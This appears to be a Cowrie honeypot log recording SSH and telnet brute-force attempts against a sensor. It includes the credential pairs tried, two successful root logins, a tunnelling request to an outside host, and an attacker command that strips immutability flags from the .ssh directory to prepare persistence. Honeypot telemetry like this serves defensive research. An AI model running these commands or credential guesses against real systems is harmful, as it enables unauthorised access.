{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:03:11.800323Z","src_ip":"212.227.235.229","session":"bfd1efd23485"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:03:11.902482Z","src_ip":"212.227.235.229","session":"bfd1efd23485"}
{"eventid":"cowrie.login.failed","username":"alex","password":"!","message":"login attempt [alex/!] failed","sensor":"my-vps","timestamp":"2025-09-09T10:03:12.339050Z","src_ip":"212.227.235.229","session":"bfd1efd23485"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:03:13.446768Z","src_ip":"212.227.235.229","session":"bfd1efd23485"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34234,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a71b286c035","protocol":"ssh","message":"New connection: 212.227.235.229:34234 (1.2.3.4:22) [session: 3a71b286c035]","sensor":"my-vps","timestamp":"2025-09-09T10:03:19.605632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:03:19.610482Z","src_ip":"212.227.235.229","session":"3a71b286c035"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:03:19.869824Z","src_ip":"212.227.235.229","session":"3a71b286c035"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51964,"dst_ip":"1.2.3.4","dst_port":22,"session":"eaa23521f63e","protocol":"ssh","message":"New connection: 212.227.235.229:51964 (1.2.3.4:22) [session: eaa23521f63e]","sensor":"my-vps","timestamp":"2025-09-09T10:03:20.186643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:03:20.188743Z","src_ip":"212.227.235.229","session":"eaa23521f63e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:03:20.455339Z","src_ip":"212.227.235.229","session":"eaa23521f63e"}
{"eventid":"cowrie.login.failed","username":"steam","password":"123","message":"login attempt [steam/123] failed","sensor":"my-vps","timestamp":"2025-09-09T10:03:20.958626Z","src_ip":"212.227.235.229","session":"3a71b286c035"}
{"eventid":"cowrie.login.failed","username":"cacti","password":"cacti2025","message":"login attempt [cacti/cacti2025] failed","sensor":"my-vps","timestamp":"2025-09-09T10:03:21.580207Z","src_ip":"212.227.235.229","session":"eaa23521f63e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:03:22.218387Z","src_ip":"212.227.235.229","session":"3a71b286c035"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:03:22.854722Z","src_ip":"212.227.235.229","session":"eaa23521f63e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":15433,"dst_ip":"1.2.3.4","dst_port":22,"session":"97b9bc5115e8","protocol":"ssh","message":"New connection: 212.227.125.160:15433 (1.2.3.4:22) [session: 97b9bc5115e8]","sensor":"my-vps","timestamp":"2025-09-09T10:03:29.548091Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:03:29.554434Z","src_ip":"212.227.125.160","session":"97b9bc5115e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":15703,"dst_ip":"1.2.3.4","dst_port":22,"session":"95fc04fa6902","protocol":"ssh","message":"New connection: 212.227.125.160:15703 (1.2.3.4:22) [session: 95fc04fa6902]","sensor":"my-vps","timestamp":"2025-09-09T10:03:29.659315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:03:29.660482Z","src_ip":"212.227.125.160","session":"95fc04fa6902"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T10:03:29.773660Z","src_ip":"212.227.125.160","session":"95fc04fa6902"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:03:30.241906Z","src_ip":"212.227.125.160","session":"95fc04fa6902"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T10:03:30.356853Z","session":"95fc04fa6902"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33972,"dst_ip":"1.2.3.4","dst_port":22,"session":"9af4b53abb9a","protocol":"ssh","message":"New connection: 212.227.235.229:33972 (1.2.3.4:22) [session: 9af4b53abb9a]","sensor":"my-vps","timestamp":"2025-09-09T10:03:56.637613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:03:56.644083Z","src_ip":"212.227.235.229","session":"9af4b53abb9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:03:56.900100Z","src_ip":"212.227.235.229","session":"9af4b53abb9a"}
{"eventid":"cowrie.login.failed","username":"status","password":"status.123","message":"login attempt [status/status.123] failed","sensor":"my-vps","timestamp":"2025-09-09T10:03:57.975756Z","src_ip":"212.227.235.229","session":"9af4b53abb9a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:03:59.239008Z","src_ip":"212.227.235.229","session":"9af4b53abb9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59980,"dst_ip":"1.2.3.4","dst_port":22,"session":"7183b55d1adc","protocol":"ssh","message":"New connection: 212.227.235.229:59980 (1.2.3.4:22) [session: 7183b55d1adc]","sensor":"my-vps","timestamp":"2025-09-09T10:04:10.275970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:04:10.305867Z","src_ip":"212.227.235.229","session":"7183b55d1adc"}
{"eventid":"cowrie.client.kex","hassh":"2aec6b44b06bec95d73f66b5d30cb69a","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2aec6b44b06bec95d73f66b5d30cb69a","sensor":"my-vps","timestamp":"2025-09-09T10:04:10.388968Z","src_ip":"212.227.235.229","session":"7183b55d1adc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35594,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d1069182b7c","protocol":"ssh","message":"New connection: 212.227.235.229:35594 (1.2.3.4:22) [session: 9d1069182b7c]","sensor":"my-vps","timestamp":"2025-09-09T10:04:13.425618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:04:13.430704Z","src_ip":"212.227.235.229","session":"9d1069182b7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:04:13.526873Z","src_ip":"212.227.235.229","session":"9d1069182b7c"}
{"eventid":"cowrie.login.failed","username":"access","password":"access@123","message":"login attempt [access/access@123] failed","sensor":"my-vps","timestamp":"2025-09-09T10:04:13.978632Z","src_ip":"212.227.235.229","session":"9d1069182b7c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:04:15.078980Z","src_ip":"212.227.235.229","session":"9d1069182b7c"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:04:20.307035Z","src_ip":"212.227.235.229","session":"7183b55d1adc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44214,"dst_ip":"1.2.3.4","dst_port":22,"session":"67bb3cf3612d","protocol":"ssh","message":"New connection: 212.227.235.229:44214 (1.2.3.4:22) [session: 67bb3cf3612d]","sensor":"my-vps","timestamp":"2025-09-09T10:04:32.011415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:04:32.017486Z","src_ip":"212.227.235.229","session":"67bb3cf3612d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:04:32.299313Z","src_ip":"212.227.235.229","session":"67bb3cf3612d"}
{"eventid":"cowrie.login.failed","username":"miner","password":"qwerty","message":"login attempt [miner/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T10:04:33.448278Z","src_ip":"212.227.235.229","session":"67bb3cf3612d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:04:34.848118Z","src_ip":"212.227.235.229","session":"67bb3cf3612d"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:04:39.660049Z","src_ip":"212.227.125.160","session":"95fc04fa6902"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60894,"dst_ip":"1.2.3.4","dst_port":22,"session":"4512314f9ad9","protocol":"ssh","message":"New connection: 212.227.235.229:60894 (1.2.3.4:22) [session: 4512314f9ad9]","sensor":"my-vps","timestamp":"2025-09-09T10:04:42.431820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:04:42.434333Z","src_ip":"212.227.235.229","session":"4512314f9ad9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:04:42.690868Z","src_ip":"212.227.235.229","session":"4512314f9ad9"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T10:04:43.730285Z","src_ip":"212.227.235.229","session":"4512314f9ad9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:04:44.990378Z","src_ip":"212.227.235.229","session":"4512314f9ad9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54024,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b0a842bce05","protocol":"telnet","message":"New connection: 212.227.125.160:54024 (1.2.3.4:23) [session: 0b0a842bce05]","sensor":"my-vps","timestamp":"2025-09-09T10:04:45.655951Z"}
{"eventid":"cowrie.session.closed","duration":8.45613169670105,"message":"Connection lost after 8 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:04:54.094188Z","src_ip":"212.227.125.160","session":"0b0a842bce05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54460,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7347498a364","protocol":"ssh","message":"New connection: 212.227.235.229:54460 (1.2.3.4:22) [session: d7347498a364]","sensor":"my-vps","timestamp":"2025-09-09T10:05:10.631012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:05:10.636539Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:05:10.907367Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd8888","message":"login attempt [root/Abcd8888] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:05:12.027351Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:05:12.638861Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:05:12.641443Z","src_ip":"212.227.235.229","session":"d7347498a364"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:05:12.644306Z","src_ip":"212.227.235.229","session":"d7347498a364"}
